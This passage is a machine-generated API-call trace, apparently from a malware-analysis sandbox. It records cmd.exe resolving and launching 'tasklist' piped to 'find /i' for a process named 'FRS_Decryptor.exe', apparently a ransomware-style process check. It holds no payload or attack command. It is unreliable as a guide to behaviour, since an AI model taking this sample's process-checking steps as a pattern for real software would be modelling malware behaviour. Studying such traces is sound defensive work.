(_String1="tasklist", _String2="KEYS") returned 9 [0138.030] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0138.030] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0138.030] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0138.030] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0138.030] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0138.030] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0138.030] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0138.030] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0138.030] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0138.030] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0138.030] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0138.030] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0138.030] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0138.030] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0138.030] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0138.030] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0138.030] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0138.030] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0138.030] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0138.030] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0138.030] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0138.030] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0138.030] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0138.030] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0138.030] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0138.030] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0138.030] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0138.030] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0138.030] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0138.030] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0138.030] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0138.030] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0138.030] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0138.031] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0138.031] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0138.031] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0138.031] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0138.031] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0138.031] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0138.031] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0138.031] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0138.031] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0138.031] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0138.031] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0138.031] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0138.031] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0138.031] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0138.031] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0138.031] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0138.031] SetErrorMode (uMode=0x0) returned 0x0 [0138.031] SetErrorMode (uMode=0x1) returned 0x0 [0138.031] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xbd5228, lpFilePart=0xa8f774 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f774*="Desktop") returned 0x1c [0138.031] SetErrorMode (uMode=0x0) returned 0x1 [0138.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.035] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.036] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xffffffff [0138.036] GetLastError () returned 0x2 [0138.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xbd5530 [0138.036] FindClose (in: hFindFile=0xbd5530 | out: hFindFile=0xbd5530) returned 1 [0138.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xffffffff [0138.036] GetLastError () returned 0x2 [0138.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xbd5530 [0138.036] FindClose (in: hFindFile=0xbd5530 | out: hFindFile=0xbd5530) returned 1 [0138.036] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.036] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.036] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0138.036] SetErrorMode (uMode=0x0) returned 0x0 [0138.037] SetErrorMode (uMode=0x1) returned 0x0 [0138.037] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xbda3c0, lpFilePart=0xa8f51c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f51c*="Desktop") returned 0x1c [0138.037] SetErrorMode (uMode=0x0) returned 0x1 [0138.037] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.037] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.037] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xffffffff [0138.037] GetLastError () returned 0x2 [0138.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xbd5628 [0138.037] FindClose (in: hFindFile=0xbd5628 | out: hFindFile=0xbd5628) returned 1 [0138.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xffffffff [0138.037] GetLastError () returned 0x2 [0138.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xbd5628 [0138.037] FindClose (in: hFindFile=0xbd5628 | out: hFindFile=0xbd5628) returned 1 [0138.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.038] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.038] GetConsoleTitleW (in: lpConsoleTitle=0xa8f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.038] InitializeProcThreadAttributeList (in: lpAttributeList=0xa8f6d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa8f6b4 | out: lpAttributeList=0xa8f6d0, lpSize=0xa8f6b4) returned 1 [0138.038] UpdateProcThreadAttribute (in: lpAttributeList=0xa8f6d0, dwFlags=0x0, Attribute=0x60001, lpValue=0xa8f6bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa8f6d0, lpPreviousValue=0x0) returned 1 [0138.038] GetStartupInfoW (in: lpStartupInfo=0xa8f708 | out: lpStartupInfo=0xa8f708*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2ec, hStdError=0x2c)) [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.038] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.039] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.039] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0138.040] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xa8f658*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa8f6a4 | out: lpCommandLine="tasklist", lpProcessInformation=0xa8f6a4*(hProcess=0x64, hThread=0x60, dwProcessId=0x924, dwThreadId=0x8c0)) returned 1 [0138.043] CloseHandle (hObject=0x60) returned 1 [0138.043] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.043] GetEnvironmentStringsW () returned 0xbd42d8* [0138.043] FreeEnvironmentStringsA (penv="=") returned 1 [0138.043] DeleteProcThreadAttributeList (in: lpAttributeList=0xa8f6d0 | out: lpAttributeList=0xa8f6d0) [0138.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0138.043] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0138.043] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0138.043] _close (_FileHandle=5) returned 0 [0138.043] _dup (_FileHandle=0) returned 4 [0138.043] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0138.043] _close (_FileHandle=3) returned 0 [0138.044] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0138.044] SetErrorMode (uMode=0x0) returned 0x0 [0138.044] SetErrorMode (uMode=0x1) returned 0x0 [0138.044] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xbd42e0, lpFilePart=0xa8f774 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f774*="Desktop") returned 0x1c [0138.044] SetErrorMode (uMode=0x0) returned 0x1 [0138.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.044] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xffffffff [0138.044] GetLastError () returned 0x2 [0138.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xbd5628 [0138.044] FindClose (in: hFindFile=0xbd5628 | out: hFindFile=0xbd5628) returned 1 [0138.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xffffffff [0138.044] GetLastError () returned 0x2 [0138.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xa8f500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f500) returned 0xbd5628 [0138.045] FindClose (in: hFindFile=0xbd5628 | out: hFindFile=0xbd5628) returned 1 [0138.045] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.045] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.045] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0138.045] SetErrorMode (uMode=0x0) returned 0x0 [0138.045] SetErrorMode (uMode=0x1) returned 0x0 [0138.045] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xbd4668, lpFilePart=0xa8f51c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f51c*="Desktop") returned 0x1c [0138.045] SetErrorMode (uMode=0x0) returned 0x1 [0138.045] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.045] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.045] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xffffffff [0138.045] GetLastError () returned 0x2 [0138.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.045] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xbd04a0 [0138.046] FindClose (in: hFindFile=0xbd04a0 | out: hFindFile=0xbd04a0) returned 1 [0138.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xffffffff [0138.046] GetLastError () returned 0x2 [0138.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xa8f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa8f2a8) returned 0xbd04a0 [0138.046] FindClose (in: hFindFile=0xbd04a0 | out: hFindFile=0xbd04a0) returned 1 [0138.046] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.046] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.046] GetConsoleTitleW (in: lpConsoleTitle=0xa8f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.046] InitializeProcThreadAttributeList (in: lpAttributeList=0xa8f6d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa8f6b4 | out: lpAttributeList=0xa8f6d0, lpSize=0xa8f6b4) returned 1 [0138.046] UpdateProcThreadAttribute (in: lpAttributeList=0xa8f6d0, dwFlags=0x0, Attribute=0x60001, lpValue=0xa8f6bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa8f6d0, lpPreviousValue=0x0) returned 1 [0138.046] GetStartupInfoW (in: lpStartupInfo=0xa8f708 | out: lpStartupInfo=0xa8f708*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2ec, hStdError=0x2c)) [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.047] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.047] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0138.047] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xa8f658*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa8f6a4 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xa8f6a4*(hProcess=0x60, hThread=0x54, dwProcessId=0x930, dwThreadId=0x8a8)) returned 1 [0138.049] CloseHandle (hObject=0x54) returned 1 [0138.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.049] GetEnvironmentStringsW () returned 0xbdad78* [0138.050] FreeEnvironmentStringsA (penv="=") returned 1 [0138.050] DeleteProcThreadAttributeList (in: lpAttributeList=0xa8f6d0 | out: lpAttributeList=0xa8f6d0) [0138.050] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0138.050] _close (_FileHandle=4) returned 0 [0138.050] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 